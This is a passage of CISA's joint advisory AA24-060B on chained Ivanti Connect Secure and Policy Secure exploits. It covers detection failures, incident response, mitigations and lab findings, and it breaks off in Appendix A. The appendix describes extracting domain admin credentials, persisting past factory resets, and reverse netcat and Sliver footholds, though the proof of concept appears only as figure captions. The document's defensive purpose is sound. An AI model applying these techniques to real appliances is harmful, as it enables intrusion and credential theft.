1634. <p>Cyber threat actors are actively exploiting multiple previously identified vulnerabilities—<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46805" title="CVE-2023-46805">CVE-2023-46805</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21887" title="CVE-2024-21887">CVE-2024-21887</a>, and <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21893" title="CVE-2024-21893">CVE-2024-21893</a>—affecting Ivanti Connect Secure and Ivanti Policy Secure gateways. The vulnerabilities impact all supported versions (9.x and 22.x) and can be used in a chain of exploits to enable malicious cyber threat actors to bypass authentication, craft malicious requests, and execute arbitrary commands with elevated privileges.</p>
1635. <p>During multiple incident response engagements associated with this activity, CISA identified that Ivanti’s internal and previous external ICT failed to detect compromise. In addition, CISA has conducted independent research in a lab environment validating that the Ivanti ICT is not sufficient to detect compromise and that a cyber threat actor may be able to gain root-level persistence despite issuing factory resets.</p>
1636. <p>The authoring organizations encourage network defenders to (1) assume that user and service account credentials stored within the affected Ivanti VPN appliances are likely compromised, (2) hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory, (3) run Ivanti’s most recent external ICT, and (4) apply available patching guidance provided by Ivanti as version updates become available. If a potential compromise is detected, organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory.</p>
1637. <p>Based upon the authoring organizations’ observations during incident response activities and available industry reporting, as supplemented by CISA’s research findings, the authoring organizations recommend that the safest course of action for network defenders is to assume a sophisticated threat actor may deploy rootkit level persistence on a device that has been reset and lay dormant for an arbitrary amount of time. For example, as outlined in <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a" title="PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure">PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure</a>), sophisticated actors may remain silent on compromised networks for long periods. The authoring organizations strongly urge all organizations to<strong> consider the significant risk</strong> of adversary access to, and persistence on, Ivanti Connect Secure and Ivanti Policy Secure gateways when <strong>determining whether to continue operating</strong> these devices in an enterprise environment.</p>
1638. <p><strong>Note: </strong>On February 9, 2024, CISA issued <a href="https://cisa.gov/news-events/directives/ed-24-01-mitigate-ivanti-connect-secure-and-ivanti-policy-secure-vulnerabilities" target="_blank" title="ED 24-01: Mitigate Ivanti Connect Secure and Ivanti Policy Secure Vulnerabilities">Emergency Directive (ED) 24-01: Mitigate Ivanti Connect Secure and Ivanti Policy Secure Vulnerabilities</a>, which requires emergency action from Federal Civilian Executive Branch (FCEB) agencies to perform specific actions on affected products.</p>
1639. <p>The Canadian Centre for Cyber Security also issued an alert, <a href="https://www.cyber.gc.ca/en/alerts-advisories/ivanti-connect-secure-and-ivanti-policy-secure-gateways-zero-day-vulnerabilities" title="Alert - Ivanti Connect Secure and Ivanti Policy Secure gateways zero-day vulnerabilities – Update 2">Ivanti Connect Secure and Ivanti Policy Secure gateways zero-day vulnerabilities</a>, which provides periodic updates for IT professionals and managers affected by the Ivanti vulnerabilities.</p>
1640. <p>Download the PDF version of this report:</p>
1641.  
1642.  
1643.  
1644.  
1645.  
1646. <div class="c-file">
1647.    <div class="c-file__download">
1648.    <a href="https://www.cisa.gov/sites/default/files/2024-02/AA24-060B-Threat-Actors-Exploit-Multiple-Vulnerabilities-in-Ivanti-Connect-Secure-and-Policy-Secure-Gateways_0.pdf" class="c-file__link" target="_blank">AA24-060B Threat Actors Exploit Multiple Vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways</a>
1649.    <span class="c-file__size">(PDF,       2.20 MB
1650.  )</span>
1651.  </div>
1652. </div>
1653. <p>For a downloadable copy of IOCs, see:</p>
1654.  
1655.  
1656.  
1657.  
1658.  
1659. <div class="c-file">
1660.    <div class="c-file__download">
1661.    <a href="https://www.cisa.gov/sites/default/files/2024-02/AA24-060B.stix_.xml" class="c-file__link" target="_blank">AA24-060B STIX XML</a>
1662.    <span class="c-file__size">(XML,       70.12 KB
1663.  )</span>
1664.  </div>
1665. </div>
1666.  
1667.  
1668.  
1669.  
1670.  
1671. <div class="c-file">
1672.    <div class="c-file__download">
1673.    <a href="https://www.cisa.gov/sites/default/files/2024-02/AA24-060B-threat-actors-exploit-multiple-vulnerabilities-in-ivanti-connect-secure-and-policy-secure-gateways.stix_.json" class="c-file__link" target="_blank">AA24-060B STIX JSON</a>
1674.    <span class="c-file__size">(JSON,       53.65 KB
1675.  )</span>
1676.  </div>
1677. </div>
1678. <h3><strong>TECHNICAL DETAILS</strong></h3>
1679. <p>This advisory uses the <a href="https://attack.mitre.org/versions/v14/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&CK<sup>®</sup> for Enterprise</a> framework, version 14. See the MITRE ATT&CK Tactics and Techniques in Appendix C for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&CK Mapping">Best Practices for MITRE ATT&CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="cisagov / decider">Decider Tool</a>.</p>
1680. <h4><strong>Overview</strong></h4>
1681. <p>On January 10, 2024, Volexity reported on two vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure gateways observed being chained to achieve unauthenticated remote code execution (RCE):[<a href="https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/" title="Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN">1</a>]</p>
1682. <ul>
1683. <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46805" title="CVE-2023-46805">CVE 2023-46805</a></li>
1684. <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21887" title="CVE-2024-21887">CVE-2024-21887</a></li>
1685. </ul>
1686. <p>Volexity first identified active exploitation in early December 2023, when they detected suspicious lateral movement [<a href="https://attack.mitre.org/versions/v14/tactics/TA0008/" title="Lateral Movement">TA0008</a>] on the network of one of their network security monitoring service customers. Volexity identified that threat actors exploited the vulnerabilities to implant web shells, including GLASSTOKEN and GIFTEDVISITOR, on internal and external-facing web servers [<a href="https://attack.mitre.org/versions/v14/techniques/T1505/003/" title="Server Software Component: Web Shell">T1505.003</a>]. Once successfully deployed, these web shells are used to execute commands on compromised devices.[<a href="https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/" title="Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN">1</a>]</p>
1687. <p>After Ivanti provided initial mitigation guidance in early January, threat actors developed a way to bypass those mitigations to deploy BUSHWALK, LIGHTWIRE, and CHAINLINE web shell variants.[<a href="https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation" title="Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation">2</a>] Following the actors’ developments, Ivanti disclosed three additional vulnerabilities:</p>
1688. <ul>
1689. <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21893" title="CVE-2024-21893">CVE-2024-21893</a> is a server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) Ivanti Policy Secure (9.x, 22.x), and Ivanti Neurons for ZTA that allows an attacker to access restricted resources without authentication.</li>
1690. <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-22024" title="CVE-2024-22024">CVE-2024-22024</a> is an XML vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x), and ZTA gateways that allows an attacker to access restricted resources without authentication.</li>
1691. <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21888" title="CVE-2024-21888">CVE-2024-21888</a> is a privilege escalation vulnerability found in the web component of Ivanti Connect Secure and Ivanti Policy Secure. This vulnerability allows threat actors to gain elevated privileges to that of an administrator.</li>
1692. </ul>
1693. <h4><strong>Observed Threat Actor Activity</strong></h4>
1694. <p>CISA has responded to multiple incidents related to the above vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways. In these incidents, actors exploited these CVEs for initial access to implant web shells and to harvest credentials stored on the devices. Post-compromise, the actors moved laterally into domain environments and have been observed leveraging tools that are native to the Ivanti appliances—such as <code>freerdp</code>, <code>ssh</code>, <code>telnet</code>, and <code>nmap</code> libraries—to expand their access to the domain environment. The result, in some cases, was a full domain compromise.</p>
1695. <p>During incident response investigations, CISA identified that Ivanti’s internal and external ICT failed to detect compromise. The organizations leveraged the integrity checker to identify file mismatches in Ivanti devices; however, CISA incident response analysis confirmed that both the internal and external versions of the ICT were not reliable due to the existence of web shells found on systems that had no file mismatches according to the ICTs. Additionally, forensic analysis showed evidence the actors were able to clean up their efforts by overwriting files, time-stomping files, and re-mounting the runtime partition to return the appliance to a “clean state.” This reinforces that ICT scans are not reliable to indicate previous compromise and can result in a false sense of security that the device is free of compromise.</p>
1696. <p>As detailed in Appendix A, CISA conducted independent research in a lab environment validating that the ICT is likely insufficient for detecting compromise and that a cyber threat actor may be able to maintain root level persistence despite issuing factory resets and appliance upgrades.</p>
1697. <h3><strong>INDICATORS OF COMPROMISE</strong></h3>
1698. <p>See Tables 1 – 4 in Appendix B for IOCs related to cyber actors exploiting multiple CVEs related to Ivanti appliances.</p>
1699. <p>For additional indicators of compromise, see:</p>
1700. <ul>
1701. <li>Volexity: <a href="https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/" title="Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN">Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN</a></li>
1702. <li>Mandiant: <a href="https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day" title="Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation">Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation</a></li>
1703. <li>Mandiant: <a href="https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation" title=" Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation">Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation</a></li>
1704. <li>Mandiant: <a href="https://www.mandiant.com/resources/blog/investigating-ivanti-exploitation-persistence" title="Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts">Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts</a></li>
1705. </ul>
1706. <p>Memory and disk forensics were used during forensic analysis, combined with the <a href="https://forums.ivanti.com/s/article/KB44755?language=en_US" title="KB44755 - Pulse Connect Secure (PCS) Integrity Assurance">Integrity Checker Tool</a>, to identify malicious files on the compromised Ivanti Connect Secure VPN appliance. This advisory provides a list of combined authoring organization IOCs and open source files identified by Volexity via network analysis.</p>
1707. <p><em><strong>Disclaimer</strong>: Some IP addresses in this advisory may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action such as blocking. Activity should not be attributed as malicious without analytical evidence to support it is used at the direction of, or controlled by, threat actors.</em></p>
1708. <h3><strong>DETECTION METHODS</strong></h3>
1709. <h4><strong>YARA Rules</strong></h4>
1710. <p>See Appendix D for additional open source YARA rules, provided by Volexity, that may aid network defenders in detecting malicious activity within Ivanti Connect Secure VPN appliances. For more information on detection methods, visit Mandiant’s blog post <a href="https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation" title="Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation">Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation</a> or the <a href="https://github.com/volexity/threat-intel/blob/main/2024/2024-01-10%20Ivanti%20Connect%20Secure/indicators/iocs.csv" title="volexity / threat-intel">Volexity GitHub page</a>.</p>
1711. <h3><strong>INCIDENT RESPONSE</strong></h3>
1712. <p>The authoring organizations encourage you to assess your organization’s user interface (UI) software and systems for evidence of compromise and to hunt for malicious activity using signatures outlined within this advisory. If compromise is suspected or detected, organizations should assume that threat actors hold full administrative access and can perform all tasks associated with the Ivanti Connect Secure VPN appliance as well as executing arbitrary code and installing malicious payloads.</p>
1713. <p><strong>Note</strong>: <em>These are vendor-managed appliances and systems may be encrypted with limited access. Thus, collecting artifacts may be limited on some versions of appliances. The authoring organizations recommend investigating associated devices on the network to identify lateral movement in the absence of access to the Secure Connect appliance.</em></p>
1714. <p>If a potential compromise is detected, organizations should:</p>
1715. <ol>
1716. <li>Quarantine or take offline potentially affected hosts.</li>
1717. <li>Reimage compromised hosts.</li>
1718. <li>Reset all credentials that may have been exposed during the compromise, including user and service accounts.</li>
1719. <li>Identify Ivanti hosts with Active Directory (AD) access, threat actors can trivially export active domain administrator credentials during initial compromise. Until there is evidence to the contrary, it is assumed that AD access on compromised systems is connected to external authentication systems such as Lightweight Directory Access Protocol (LDAP) and AD.</li>
1720. <li>Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
1721. <ul>
1722. <li><strong>Note:</strong> Removing malicious administrator accounts may not fully mitigate risk considering threat actors may have established additional persistence mechanisms.</li>
1723. </ul>
1724. </li>
1725. <li>Report the compromise to FBI Internet Crime Complaint Center (IC3) at IC3.gov, local FBI field Office, or CISA via the agency’s <a href="https://www.cisa.gov/forms/report" title="Incident Reporting System">Incident Reporting System</a> or its 24/7 Operations Center (<a href="mailto:report@cisa.gov" title="Report to CISA">report@cisa.gov</a> or 888-282-0870). State, local, tribal, or territorial government entities can also report to MS-ISAC (<a href="mailto:SOC@cisecurity.org" title="Report to MS-ISAC">SOC@cisecurity.org</a> or 866-787-4722). Organizations outside of the United States should contact their national cyber center. (See the Reporting section.)</li>
1726. </ol>
1727. <h3><strong>MITIGATIONS</strong></h3>
1728. <p><em>These mitigations apply to all critical infrastructure organizations and network defenders using Ivanti Connect Secure VPN and Ivanti Policy Secure. The authoring organizations recommend that software manufacturers incorporate Secure by Design principles and tactics into their software development practices. These principles and tactics can limit the impact of exploitation—such as threat actors leveraging newly discovered, unpatched vulnerabilities within Ivanti appliances—thus, strengthening the secure posture for their customers.</em></p>
1729. <p><em>For more information on secure by design, see CISA’s </em><a href="https://www.cisa.gov/securebydesign" title="Secure by Design"><em>Secure by Design</em></a><em> webpage and </em><a href="https://www.cisa.gov/resources-tools/resources/secure-by-design-and-default" title="Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software"><em>joint guide</em></a><em>.</em></p>
1730. <p>The authoring organizations recommend organizations implement the mitigations below to improve your cybersecurity posture based on threat actor activity and to reduce the risk of compromise associated with Ivanti vulnerabilities. These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p>
1731. <ul>
1732. <li><strong>As organizations make risk decisions in choosing a VPN, to include decisions regarding continued operation of Ivanti Connect Secure and Policy Secure gateways</strong>, avoid VPN solutions that use proprietary protocols or non-standard features. VPNs as a class of devices carry some specific risks that a non-expert implementer may trigger (e.g., authentication integration and patching). When choosing a VPN, organizations should consider vendors who:
1733. <ul>
1734. <li>Provide a <a href="https://www.cisa.gov/sbom" title="Software Bill of Materials (SBOM)">Software Bill of Materials (SBOM)</a> to proactively identify, and enable remediation of, embedded software vulnerabilities, such as deprecated operating systems.</li>
1735. <li>Allow a restore from trusted media to establish a root of trust. If the software validation tooling can be modified by the software itself, there is no way to establish a root of trust other than returning the device to the manufacturer (return material authorization [RMA]).</li>
1736. <li>Are a CVE Numbering Authority (CNA) so that CVEs are assigned to emerging vulnerabilities in a timely manner.</li>
1737. <li>Have a public Vulnerability Disclosure Policy (VDP) to enable security researchers to proactively share and disclose vulnerabilities through coordinated vulnerability disclosure (CVD).</li>
1738. <li>Have in place a clear end-of-life policy (EoL) to prepare customers for updating to supported product versions.</li>
1739. </ul>
1740. </li>
1741. <li><strong>Limit outbound internet connections from SSL VPN appliances</strong> to restrict access to required services. This will limit the ability of an actor to download tools or malware onto the device or establish outbound connections to command and control (C2) servers.</li>
1742. <li><strong>Ensure SSL VPN appliances</strong> configured with Active Directory or LDAP authentication use low privilege accounts for the LDAP bind.</li>
1743. <li><strong>Limit SSL VPN connections</strong> to unprivileged accounts only to help limit the exposure of privileged account credentials.</li>
1744. <li><strong>Keep all operating systems, software, and firmware up to date. </strong>Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">known exploited vulnerabilities</a> in internet-facing systems [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="CPG Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 1.E</a>].</li>
1745. <li><strong>Secure remote access tools.</strong>
1746. <ul>
1747. <li><strong>Implement application controls</strong> to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.</li>
1748. </ul>
1749. </li>
1750. <li><strong>Strictly limit the use of Remote Desktop Protocols (RDP) and other remote desktop services</strong>. If RDP is necessary, rigorously apply best practices, for example [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="CPG Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.W</a>]:
1751. <ul>
1752. <li>Audit the network for systems using RDP.</li>
1753. <li>Close unused RDP ports.</li>
1754. <li>Enforce account lockouts after a specified number of attempts.</li>
1755. <li>Apply <a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf" title="Implementing Phishing-Resistant MFA">phishing-resistant multifactor authentication (MFA)</a>.</li>
1756. <li>Log RDP login attempts.</li>
1757. </ul>
1758. </li>
1759. <li><strong>Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations </strong>requiring administrator privileges to reduce the risk of lateral movement by PsExec.</li>
1760. <li><strong>Implement a recovery plan </strong>to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).</li>
1761. <li><strong>Require all accounts </strong>with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with <a href="https://pages.nist.gov/800-63-3/" title="Digital Identity Guidelines">NIST's standards</a> for developing and managing password policies.
1762. <ul>
1763. <li>Use longer passwords consisting of at least 15 characters [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="CPG Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.B</a>].</li>
1764. <li>Store passwords in hashed format using industry-recognized password managers.</li>
1765. <li>Add password user “salts” to shared login credentials.</li>
1766. <li>Avoid reusing passwords [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="CPG Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.C</a>].</li>
1767. <li>Implement multiple failed login attempt account lockouts [<a href="https://www.cisa.gov/sites/default/files/2023-03/CISA_CPG_REPORT_v1.0.1_FINAL.pdf" title="CPG Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.G</a>].</li>
1768. <li>Disable password “hints.”</li>
1769. <li>Require administrator credentials to install software.</li>
1770. </ul>
1771. </li>
1772. <li><strong>Review the CISA and NSA joint guidance</strong> for <a href="https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF" title="Selecting and Hardening Remote Access VPN Solutions">Selecting and Hardening Remote Access VPN Solutions</a>.</li>
1773. </ul>
1774. <h3><strong>VALIDATE SECURITY CONTROLS</strong></h3>
1775. <p>In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how the controls perform against the ATT&CK techniques described in this advisory.</p>
1776. <p>To get started:</p>
1777. <ol>
1778. <li>Select an ATT&CK technique described in this advisory (Appendix C).</li>
1779. <li>Align your security technologies against the technique.</li>
1780. <li>Test your technologies against the technique.</li>
1781. <li>Analyze your detection and prevention technologies’ performance.</li>
1782. <li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
1783. <li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
1784. </ol>
1785. <p>The authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.</p>
1786. <h3><strong>REPORTING</strong></h3>
1787. <p>U.S. organizations should report every potential cyber incident to the U.S. government. When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Reports can be submitted to the FBI’s <a href="https://www.ic3.gov/" title="Internet Crime Complaint Center (IC3)">Internet Crime Complaint Center (IC3)</a>, <a href="https://www.fbi.gov/contact-us/field-offices" title="Field Offices">local FBI Field Office</a>, or CISA via the agency’s <a href="https://www.cisa.gov/forms/report" title="Incident Reporting System">Incident Reporting System</a> or its 24/7 Operations Center at <a href="mailto:report@cisa.gov?subject=Incident%20Report" title="Report to CISA">report@cisa.gov</a> or by calling 1-844-Say-CISA (1-844-729-2472).</p>
1788. <p>The FBI encourages organizations to report information concerning suspicious or criminal activity to their <a href="https://www.fbi.gov/contact-us/field-offices" title="Field Offices">local FBI Field Office</a>.</p>
1789. <p>Australian organizations that have been impacted or require assistance regarding Ivanti compromise, contact ASD’s ACSC via 1300 CYBER1 (1300 292 371), or by submitting a report to <a href="https://www.cyber.gov.au/" title="Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)">cyber.gov.au</a>.</p>
1790. <p>UK organizations that have been impacted by Ivanti compromise, should <a href="https://www.gov.uk/guidance/where-to-report-a-cyber-incident" title="Guidance - Where to Report a Cyber Incident">report</a> the incident to the National Cyber Security Centre.</p>
1791. <p>Organizations outside of the United States or Australia should contact their national cyber center.</p>
1792. <h3><strong>REFERENCES</strong></h3>
1793. <ol>
1794. <li><a href="https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/" title="Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN">Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN | Volexity</a></li>
1795. <li><a href="https://www.volexity.com/blog/2024/01/15/ivanti-connect-secure-vpn-exploitation-goes-global/" title="Ivanti Connect Secure VPN Exploitation Goes Global">Ivanti Connect Secure VPN Exploitation Goes Global | Volexity</a></li>
1796. <li><a href="https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US" title="KB CVE-2023-46805 (Authentication Bypass) & CVE-2024-21887 (Command Injection) for Ivanti Connect Secure and Ivanti Policy Secure Gateways">KB CVE-2023-46805 (Authentication Bypass) & CVE-2024-21887 (Command Injection) for Ivanti Connect Secure and Ivanti Policy Secure Gateways</a></li>
1797. <li><a href="https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation" title="Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation">Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation | Mandiant</a></li>
1798. </ol>
1799. <h3><strong>DISCLAIMER</strong></h3>
1800. <p>The information in this report is being provided “as is” for informational purposes only. CISA and authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and authoring organizations.</p>
1801. <h3><strong>ACKNOWLEDGEMENTS</strong></h3>
1802. <p>Volexity, Mandiant, and Ivanti contributed to this advisory.</p>
1803. <h3><strong>VERSION HISTORY</strong></h3>
1804. <p>February 29, 2024: Initial version.</p>
1805. <h3><strong>APPENDIX A: CISA’S PRODUCT EVALUATION FINDINGS</strong></h3>
1806. <h4><strong>Research Approach</strong></h4>
1807. <p>As part of ongoing efforts to effectively serve the cybersecurity community with actionable insights and guidance, CISA conducted research by using a free and downloadable version of the Ivanti Connect Secure virtual appliance to assess potential attack paths and adversary persistence mechanisms. The virtual appliances were not connected to the internet, and were deployed in a closed virtualized network, with a non-internet connected Active Directory. This research included a variety of tests on version <code>22.3R1 Build 1647</code>, connected to Active Directory credentials, to leverage the access obtained through <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46805" title="CVE-2023-46805">CVE-2023-46805</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21887" title="CVE-2024-21887">CVE-2024-21887</a> and <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21893" title="CVE-2024-21893">CVE-2024-21893</a>. Put simply, CISA’s research team wanted to answer the question: “How far could an attacker go if they set were to exploit these CVEs remotely?”</p>
1808. <h4><strong>Persistent Post-Reset and -Upgrade Access</strong></h4>
1809. <p>Leveraging these vulnerabilities, CISA researchers were able to exfiltrate domain administrator cleartext credentials [<a href="https://attack.mitre.org/versions/v14/tactics/TA0006/">TA0006</a>], gain root-level persistence [<a href="https://attack.mitre.org/versions/v14/tactics/TA0003/">TA0003</a>], and bypass integrity checks used by the Integrity Checker application. CISA’s Incident Response team observed these specific techniques leveraged during the agency’s incident response engagements, along with the native tools and libraries to conduct internal reconnaissance and compromise domains behind the Ivanti appliances. CISA researchers assess that threat actors are able to use the credentials to move deeper into the environment.</p>
1810. <p>The ability to exfiltrate domain administrator cleartext credentials, if saved when adding an “Active Directory Authentication server” during setup, was accomplished by using the root-level access obtained from the vulnerabilities to interface directly with the internal server and retrieve the cached credentials as shown in<strong> Figure 4, APPENDIX A</strong>. Users who currently have active sessions to the appliance could have their base64 encoded active directory cleartext passwords, in addition to the New Technology LAN Manager (NTLM) password hashes, retrieved with the same access, as shown in <strong>Figure 10, APPENDIX A</strong>. In addition to users with active sessions, users previously authenticated can have base64 encoded active directory plaintext passwords and NTLM hashes harvested from the backups of the data.mdb database files stored on the appliance, as shown in <strong>Figure 15 and 16, APPENDIX A.</strong></p>
1811. <p>The root-level access allows adversaries to maintain persistence despite issuing factory resets and appliance upgrades while deceiving the provided integrity checkers, creating the illusion of a clean installation. Due to the persistence mechanism being stored on the encrypted partition of the drive and inaccurate integrity check results, it is untenable for network administrators to validate their application has not been compromised without also decrypting the partition and validating against a clean installation of the appliance, which are actions not easily accomplished at present. Without major alterations of the integrity checking process, it is conceivable that new vulnerabilities that afford root-level access to the appliance could also result in root-kit level persistence to the appliance.</p>
1812. <p>Below is proof of concept being released by CISA, which demonstrates the capacity of and opportunity for a threat actor to exfiltrate Domain Administrator credentials that were used during appliance configuration:</p>
1813.  
1814.  
1815.  
1816. <figure class="c-figure c-figure--image u-align-center" role="group">
1817.  
1818.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%201%20-%20Ivanti%20Domain%20Join%20Configuration%20with%20%E2%80%9CSave%20Credentials%E2%80%9D.png?itok=OLjGUVec" width="1024" height="587" alt="Figure 1: Ivanti Domain Join Configuration with “Save Credentials”">
1819.  
1820.  
1821.  
1822. </div>
1823.      <figcaption class="c-figure__caption"><em>Figure 1: Ivanti Domain Join Configuration with “Save Credentials”</em>​​​​​</figcaption>
1824.  </figure>
1825.  
1826.  
1827.  
1828. <figure class="c-figure c-figure--image u-align-center" role="group">
1829.  
1830.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%202%20-%20CVE-2023-46805%20Exploitation%20for%20Reverse%20Netcat%20Connection.png?itok=rMECD9JP" width="1024" height="423" alt="Figure 2: CVE-2023-46805 Exploitation for Reverse Netcat Connection">
1831.  
1832.  
1833.  
1834. </div>
1835.      <figcaption class="c-figure__caption"><em>Figure 2: CVE-2023-46805 Exploitation for Reverse Netcat Connection</em></figcaption>
1836.  </figure>
1837.  
1838.  
1839.  
1840. <figure class="c-figure c-figure--image u-align-center" role="group">
1841.  
1842.  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-02/Figure%203%20-%20Upgrade%20Netcat%20Connection%20to%20Sliver%20Implant.png?itok=Gn-ayrul" width="1024" height="517" alt="Figure 3: Upgrade Netcat Connection to Sliver Implant">
1843.  
1844.  
1845.  
1846. </div>
1847.      <figcaption class="c-figure__caption"><em>Figure 3: Upgrade Netcat Connection to Sliver Implant</em></figcaption>
1848.  </figure>
1849.  
1850.  
1851.  
1852. <figure class="c-figure c-figure--image u-align-center" role="group">
1853.  
